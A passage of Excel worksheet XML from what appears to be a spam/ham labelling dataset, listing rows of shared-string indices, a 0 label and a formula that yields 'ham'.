        <v>2716</v>
      </c>
      <c r="B3307">
        <v>0</v>
      </c>
      <c r="C3307" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3308" t="s">
        <v>2717</v>
      </c>
      <c r="B3308">
        <v>0</v>
      </c>
      <c r="C3308" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3309" t="s">
        <v>2718</v>
      </c>
      <c r="B3309">
        <v>0</v>
      </c>
      <c r="C3309" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3310" t="s">
        <v>2719</v>
      </c>
      <c r="B3310">
        <v>0</v>
      </c>
      <c r="C3310" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3311" t="s">
        <v>2720</v>
      </c>
      <c r="B3311">
        <v>0</v>
      </c>
      <c r="C3311" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3312" t="s">
        <v>2721</v>
      </c>
      <c r="B3312">
        <v>0</v>
      </c>
      <c r="C3312" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3313" t="s">
        <v>2722</v>
      </c>
      <c r="B3313">
        <v>0</v>
      </c>
      <c r="C3313" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3314" t="s">
        <v>2723</v>
      </c>
      <c r="B3314">
        <v>0</v>
      </c>
      <c r="C3314" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3315" t="s">
        <v>2724</v>
      </c>
      <c r="B3315">
        <v>0</v>
      </c>
      <c r="C3315" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3316" t="s">
        <v>2725</v>
      </c>
      <c r="B3316">
        <v>0</v>
      </c>
      <c r="C3316" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3317" t="s">
        <v>2726</v>
      </c>
      <c r="B3317">
        <v>0</v>
      </c>
      <c r="C3317" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3318" t="s">
        <v>2727</v>
      </c>
      <c r="B3318">
        <v>0</v>
      </c>
      <c r="C3318" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3319" t="s">
        <v>2728</v>
      </c>
      <c r="B3319">
        <v>0</v>
      </c>
      <c r="C3319" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3320" t="s">
        <v>2729</v>
      </c>
      <c r="B3320">
        <v>0</v>
      </c>
      <c r="C3320" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3321" t="s">
        <v>2730</v>
      </c>
      <c r="B3321">
        <v>0</v>
      </c>
      <c r="C3321" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3322" t="s">
        <v>21</v>
      </c>
      <c r="B3322">
        <v>0</v>
      </c>
      <c r="C3322" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3323" t="s">
        <v>2731</v>
      </c>
      <c r="B3323">
        <v>0</v>
      </c>
      <c r="C3323" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3324" t="s">
        <v>2732</v>
      </c>
      <c r="B3324">
        <v>0</v>
      </c>
      <c r="C3324" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3325" t="s">
        <v>2733</v>
      </c>
      <c r="B3325">
        <v>0</v>
      </c>
      <c r="C3325" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3326" t="s">
        <v>2734</v>
      </c>
      <c r="B3326">
        <v>0</v>
      </c>
      <c r="C3326" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3327" t="s">
        <v>2735</v>
      </c>
      <c r="B3327">
        <v>0</v>
      </c>
      <c r="C3327" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3328" t="s">
        <v>2736</v>
      </c>
      <c r="B3328">
        <v>0</v>
      </c>
      <c r="C3328" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3329" t="s">
        <v>2737</v>
      </c>
      <c r="B3329">
        <v>0</v>
      </c>
      <c r="C3329" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3330" t="s">
        <v>2738</v>
      </c>
      <c r="B3330">
        <v>0</v>
      </c>
      <c r="C3330" t="str">
        <f t="shared" ref="C3330:C3393" si="52">IF(B3330="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="3331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3331" t="s">
        <v>2739</v>
      </c>
      <c r="B3331">
        <v>0</v>
      </c>
      <c r="C3331" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3332" t="s">
        <v>2740</v>
      </c>
      <c r="B3332">
        <v>0</v>
      </c>
      <c r="C3332" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3333" t="s">
        <v>21</v>
      </c>
      <c r="B3333">
        <v>0</v>
      </c>
      <c r="C3333" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3334" t="s">
        <v>2741</v>
      </c>
      <c r="B3334">
        <v>0</v>
      </c>
      <c r="C3334" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3335" t="s">
        <v>2742</v>
      </c>
      <c r="B3335">
        <v>0</v>
      </c>
      <c r="C3335" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3336" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3336" t="s">
        <v>2743</v>
      </c>
      <c r="B3336">
        <v>0</v>
      </c>
      <c r="C3336" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3337" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3337" t="s">
        <v>2744</v>
      </c>
      <c r="B3337">
        <v>0</v>
      </c>
      <c r="C3337" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3338" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3338" t="s">
        <v>2745</v>
      </c>
      <c r="B3338">
        <v>0</v>
      </c>
      <c r="C3338" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3339" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3339" t="s">
        <v>2746</v>
      </c>
      <c r="B3339">
        <v>0</v>
      </c>
      <c r="C3339" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3340" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3340" t="s">
        <v>2747</v>
      </c>
      <c r="B3340">
        <v>0</v>
      </c>
      <c r="C3340" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3341" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3341" t="s">
        <v>2748</v>
      </c>
      <c r="B3341">
        <v>0</v>
      </c>
      <c r="C3341" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3342" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3342" t="s">
        <v>2749</v>
      </c>
      <c r="B3342">
        <v>0</v>
      </c>
      <c r="C3342" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3343" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3343" t="s">
        <v>21</v>
      </c>
      <c r="B3343">
        <v>0</v>
      </c>
      <c r="C3343" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3344" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3344" t="s">
        <v>2750</v>
      </c>
      <c r="B3344">
        <v>0</v>
      </c>
      <c r="C3344" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3345" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3345" t="s">
        <v>21</v>
      </c>
      <c r="B3345">
        <v>0</v>
      </c>
      <c r="C3345" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3346" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3346" t="s">
        <v>2751</v>
      </c>
      <c r="B3346">
        <v>0</v>
      </c>
      <c r="C3346" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3347" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3347" t="s">
        <v>2752</v>
      </c>
      <c r="B3347">
        <v>0</v>
      </c>
      <c r="C3347" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3348" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3348" t="s">
        <v>2753</v>
      </c>
      <c r="B3348">
        <v>0</v>
      </c>
      <c r="C3348" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3349" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3349" t="s">
        <v>2754</v>
      </c>
      <c r="B3349">
        <v>0</v>
      </c>
      <c r="C3349" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3350" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3350" t="s">
        <v>2755</v>
      </c>
      <c r="B3350">
        <v>0</v>
      </c>
      <c r="C3350" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3351" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3351" t="s">
        <v>2756</v>
      </c>
      <c r="B3351">
        <v>0</v>
      </c>
      <c r="C3351" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3352" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3352" t="s">
        <v>2757</v>
      </c>
      <c r="B3352">
        <v>0</v>
      </c>
      <c r="C3352" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3353" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3353" t="s">
        <v>2758</v>
      </c>
      <c r="B3353">
        <v>0</v>
      </c>
      <c r="C3353" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3354" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3354" t="s">
        <v>2759</v>
      </c>
      <c r="B3354">
        <v>0</v>
      </c>
      <c r="C3354" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3355" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3355" t="s">
        <v>2760</v>
      </c>
      <c r="B3355">
        <v>0</v>
      </c>
      <c r="C3355" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3356" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3356" t="s">
        <v>2761</v>
      </c>
      <c r="B3356">
        <v>0</v>
      </c>
      <c r="C3356" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3357" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3357" t="s">
        <v>2762</v>
      </c>
      <c r="B3357">
        <v>0</v>
      </c>
      <c r="C3357" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3358" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3358" t="s">
        <v>2763</v>
      </c>
      <c r="B3358">
        <v>0</v>
      </c>
      <c r="C3358" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3359" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3359" t="s">
        <v>2764</v>
      </c>
      <c r="B3359">
        <v>0</v>
      </c>
      <c r="C3359" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3360" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3360" t="s">
        <v>2765</v>
      </c>
      <c r="B3360">
        <v>0</v>
      </c>
      <c r="C3360" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3361" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3361" t="s">
        <v>2766</v>
      </c>
      <c r="B3361">
        <v>0</v>
      </c>
      <c r="C3361" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3362" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3362" t="s">
        <v>2767</v>
      </c>
      <c r="B3362">
        <v>0</v>
      </c>
      <c r="C3362" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3363" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3363" t="s">
        <v>2768</v>
      </c>
      <c r="B3363">
        <v>0</v>
      </c>
      <c r="C3363" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3364" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3364" t="s">
        <v>2769</v>
      </c>
      <c r="B3364">
        <v>0</v>
      </c>
      <c r="C3364" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3365" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3365" t="s">
        <v>21</v>
      </c>
      <c r="B3365">
        <v>0</v>
      </c>
      <c r="C3365" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3366" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3366" t="s">
        <v>21</v>
      </c>
      <c r="B3366">
        <v>0</v>
      </c>
      <c r="C3366" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3367" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3367" t="s">
        <v>2770</v>
      </c>
      <c r="B3367">
        <v>0</v>
      </c>
      <c r="C3367" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3368" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3368" t="s">
        <v>2771</v>
      </c>
      <c r="B3368">
        <v>0</v>
      </c>
      <c r="C3368" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3369" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3369" t="s">
        <v>2772</v>
      </c>
      <c r="B3369">
        <v>0</v>
      </c>
      <c r="C3369" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3370" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3370" t="s">
        <v>21</v>
      </c>
      <c r="B3370">
        <v>0</v>
      </c>
      <c r="C3370" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3371" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3371" t="s">
        <v>21</v>
      </c>
      <c r="B3371">
        <v>0</v>
      </c>
      <c r="C3371" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3372" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3372" t="s">
        <v>2773</v>
      </c>
      <c r="B3372">
        <v>0</v>
      </c>
      <c r="C3372" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3373" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3373" t="s">
        <v>21</v>
      </c>
      <c r="B3373">
        <v>0</v>
      </c>
      <c r="C3373" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3374" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3374" t="s">
        <v>2774</v>
      </c>
      <c r="B3374">
        <v>0</v>
      </c>
      <c r="C3374" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3375" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3375" t="s">
        <v>2775</v>
      </c>
      <c r="B3375">
        <v>0</v>
      </c>
      <c r="C3375" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3376" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3376" t="s">
        <v>2776</v>
      </c>
      <c r="B3376">
        <v>0</v>
      </c>
      <c r="C3376" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3377" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3377" t="s">
        <v>2777</v>
      </c>
      <c r="B3377">
        <v>0</v>
      </c>
      <c r="C3377" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3378" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3378" t="s">
        <v>2778</v>
      </c>
      <c r="B3378">
        <v>0</v>
      </c>
      <c r="C3378" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3379" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3379" t="s">
        <v>2779</v>
      </c>
      <c r="B3379">
        <v>0</v>
      </c>
      <c r="C3379" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3380" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3380" t="s">
        <v>2780</v>
      </c>
      <c r="B3380">
        <v>0</v>
      </c>
      <c r="C3380" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3381" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3381" t="s">
        <v>2781</v>
      </c>
      <c r="B3381">
        <v>0</v>
      </c>
      <c r="C3381" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3382" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3382" t="s">
        <v>2782</v>
      </c>
      <c r="B3382">
        <v>0</v>
      </c>
      <c r="C3382" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3383" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3383" t="s">
        <v>2783</v>
      </c>
      <c r="B3383">
        <v>0</v>
      </c>
      <c r="C3383" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3384" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3384" t="s">
        <v>2784</v>
      </c>
      <c r="B3384">
        <v>0</v>
      </c>
      <c r="C3384" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3385" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3385" t="s">
        <v>2785</v>
      </c>
      <c r="B3385">
        <v>0</v>
      </c>
      <c r="C3385" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3386" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3386" t="s">
        <v>2786</v>
      </c>
      <c r="B3386">
        <v>0</v>
      </c>
      <c r="C3386" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3387" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3387" t="s">
        <v>2787</v>
      </c>
      <c r="B3387">
        <v>0</v>
      </c>
      <c r="C3387" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3388" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3388" t="s">
        <v>21</v>
      </c>
      <c r="B3388">
        <v>0</v>
      </c>
      <c r="C3388" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3389" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3389" t="s">
        <v>2788</v>
      </c>
      <c r="B3389">
        <v>0</v>
      </c>
      <c r="C3389" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3390" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3390" t="s">
        <v>2789</v>
      </c>
      <c r="B3390">
        <v>0</v>
      </c>
      <c r="C3390" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3391" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3391" t="s">
        <v>2790</v>
      </c>
      <c r="B3391">
        <v>0</v>
      </c>
      <c r="C3391" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3392" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3392" t="s">
        <v>2791</v>
      </c>
      <c r="B3392">
        <v>0</v>
      </c>
      <c r="C3392" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3393" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3393" t="s">
        <v>2792</v>
      </c>
      <c r="B3393">
        <v>0</v>
      </c>
      <c r="C3393" t="str">
        <f t="shared" si="52"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3394" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3394" t="s">
        <v>2793</v>
      </c>
      <c r="B3394">
        <v>0</v>
      </c>
      <c r="C3394" t="str">
        <f t="shared" ref="C3394:C3457" si="53">IF(B3394="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="3395" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3395" t="s">
        <v>2794</v>
      </c>
      <c r="B3395">
        <v>0</v>
      </c>
      <c r="C3395" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3396" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3396" t="s">
        <v>2795</v>
      </c>
      <c r="B3396">
        <v>0</v>
      </c>
      <c r="C3396" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3397" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3397" t="s">
        <v>2796</v>
      </c>
      <c r="B3397">
        <v>0</v>
      </c>
      <c r="C3397" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3398" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3398" t="s">
        <v>2797</v>
      </c>
      <c r="B3398">
        <v>0</v>
      </c>
      <c r="C3398" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3399" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3399" t="s">
        <v>2798</v>
      </c>
      <c r="B3399">
        <v>0</v>
      </c>
      <c r="C3399" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3400" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3400" t="s">
        <v>2799</v>
      </c>
      <c r="B3400">
        <v>0</v>
      </c>
      <c r="C3400" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3401" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3401" t="s">
        <v>2800</v>
      </c>
      <c r="B3401">
        <v>0</v>
      </c>
      <c r="C3401" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3402" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3402" t="s">
        <v>2801</v>
      </c>
      <c r="B3402">
        <v>0</v>
      </c>
      <c r="C3402" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3403" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3403" t="s">
        <v>2802</v>
      </c>
      <c r="B3403">
        <v>0</v>
      </c>
      <c r="C3403" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3404" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3404" t="s">
        <v>2803</v>
      </c>
      <c r="B3404">
        <v>0</v>
      </c>
      <c r="C3404" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3405" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3405" t="s">
        <v>2804</v>
      </c>
      <c r="B3405">
        <v>0</v>
      </c>
      <c r="C3405" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3406" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3406" t="s">
        <v>21</v>
      </c>
      <c r="B3406">
        <v>0</v>
      </c>
      <c r="C3406" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3407" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3407" t="s">
        <v>2805</v>
      </c>
      <c r="B3407">
        <v>0</v>
      </c>
      <c r="C3407" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3408" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3408" t="s">
        <v>2806</v>
      </c>
      <c r="B3408">
        <v>0</v>
      </c>
      <c r="C3408" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3409" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3409" t="s">
        <v>2807</v>
      </c>
      <c r="B3409">
        <v>0</v>
      </c>
      <c r="C3409" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3410" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3410" t="s">
        <v>2808</v>
      </c>
      <c r="B3410">
        <v>0</v>
      </c>
      <c r="C3410" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3411" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3411" t="s">
        <v>2809</v>
      </c>
      <c r="B3411">
        <v>0</v>
      </c>
      <c r="C3411" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3412" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3412" t="s">
        <v>2810</v>
      </c>
      <c r="B3412">
        <v>0</v>
      </c>
      <c r="C3412" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3413" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3413" t="s">
        <v>2811</v>
      </c>
      <c r="B3413">
        <v>0</v>
      </c>
      <c r="C3413" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3414" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3414" t="s">
        <v>2812</v>
      </c>
      <c r="B3414">
        <v>0</v>
      </c>
      <c r="C3414" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3415" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3415" t="s">
        <v>2813</v>
      </c>
      <c r="B3415">
        <v>0</v>
      </c>
      <c r="C3415" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3416" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3416" t="s">
        <v>2814</v>
      </c>
      <c r="B3416">
        <v>0</v>
      </c>
      <c r="C3416" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3417" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3417" t="s">
        <v>2815</v>
      </c>
      <c r="B3417">
        <v>0</v>
      </c>
      <c r="C3417" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3418" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3418" t="s">
        <v>2816</v>
      </c>
      <c r="B3418">
        <v>0</v>
      </c>
      <c r="C3418" t="str">
        <f t="shared" si="53"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3419" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3419" t="s">
        <v>2817</v>
      </c>
      <c r="B3419">
        <v>0</v>
      </c>
      <c r="C3419" t="str">
